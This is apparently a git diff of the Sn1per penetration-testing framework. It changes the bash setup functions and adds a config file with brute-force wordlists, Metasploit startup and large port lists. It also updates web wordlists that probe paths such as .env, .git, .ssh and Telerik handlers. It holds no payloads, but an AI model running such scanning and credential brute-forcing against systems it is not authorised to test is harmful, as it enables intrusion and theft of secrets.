echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
echo ""
}
@ -314,12 +276,32 @@ function init {
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/credentials 2> /dev/null
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
mkdir $LOOT_DIR/exploits 2> /dev/null
mkdir $LOOT_DIR/web 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
/etc/init.d/metasploit start 2> /dev/null > /dev/null 2>&1 &
msfdb start 2> /dev/null > /dev/null
if [ "$AUTOBRUTE" == "1" ]; then
touch $LOOT_DIR/scans/$TARGET-autobrute.txt 2> /dev/null
fi
if [ "$FULLNMAPSCAN" == "1" ]; then
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
fi
if [ "$OSINT" == "1" ]; then
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
fi
if [ "$RECON" == "1" ]; then
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
fi
}
function loot {
@ -353,9 +335,9 @@ function loot {
for a in `ls sniper-*.txt 2>/dev/null`;
do
# HTML OUTPUT
cat "$a" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" > $LOOT_DIR/reports/$a.txt
echo "$a" | aha > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" | aha >> $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
done
cd ..
@ -366,6 +348,13 @@ function loot {
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
cd $LOOT_DIR/screenshots/
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
cd $LOOT_DIR
SNIPER_PRO=$INSTALL_DIR/pro.sh
if [ -f $SNIPER_PRO ]; then
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
@ -419,6 +408,7 @@ fi
source modes/discover.sh
source modes/flyover.sh
source modes/fullportonly.sh
source modes/web.sh
source modes/webporthttp.sh
source modes/webporthttps.sh

50
sniper.conf Normal file
View File

@ -0,0 +1,50 @@
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="$INSTALL_DIR/plugins"
WEB_BRUTE_FAST="$INSTALL_DIR/wordlists/toplist-fast-sorted.txt"
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-sorted.txt"
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-sorted.txt"
DOMAINS_DEFAULT="$PLUGINS_DIR/dnscan/subdomains-10000.txt"
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
THEHARVESTER="/usr/share/theharvester/theharvester.py"
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# DEFAULT SETTINGS
AUTOBRUTE="0"
FULLNMAPSCAN="0"
OSINT="0"
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
METASPLOIT_IMPORT="0"
# PLUGINS
SUBLIST3R="1"
AMASS="1"
SUBFINDER="1"
DNSCAN="1"
CRTSH="1"
SUBOVER="1"
CLOUDHUNTER="0"
SSL="1"
PASSIVE_SPIDER="1"
BLACKWIDOW="1"

View File

@ -1,6 +1,6 @@
#!/bin/bash
# Uninstall script for sn1per
#
# Uninstall script for Sn1per
# Created by @xer0dayz - https://xerosecurity.com
# VARS
OKBLUE='\033[94m'
OKRED='\033[91m'
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
echo ""
INSTALL_DIR=/usr/share/sniper

View File

@ -1,4 +1,3 @@
@
*
0
@ -273570,6 +273569,7 @@ ns2.aconet.it.
ns2b
ns2.barrie
ns2.cc
ns2.cl
ns2.cl.bellsouth.net.
ns2.cloud
ns2.cnpdns.co.uk.
@ -273616,6 +273616,7 @@ ns37
ns38
ns39
ns3a
ns3.cl
ns3.cl.bellsouth.net.
ns3.cnpdns.co.uk.
ns3.ecircle.com.
@ -293534,6 +293535,7 @@ quasimoto
quasit
quasituttogratis-guadagna
quat
quatro
quatro.oweb.com.
quattro
quaver

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,35 @@
index
index.asp
index.html
index.htm
index.jsp
index.aspx
index.php
sitemap.xml
robots.txt
cgi-bin
phpmyadmin
phpMyAdmin
.env
.git
.svn
.bashrc
.ssh
wordpress
wp
images
img
css
blog
upload
uploads
scripts
api
home
user
users
admin
Admin
data
portal
js

View File

@ -1,4 +1,10 @@
status_.cgi
/Data/
/Data/Log/
/GreenCMS-beta/
/GreenCMS-beta/Data/Log
status_.cgi
Telerik.Web.UI.DialogHandler.aspx
_
__
.

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff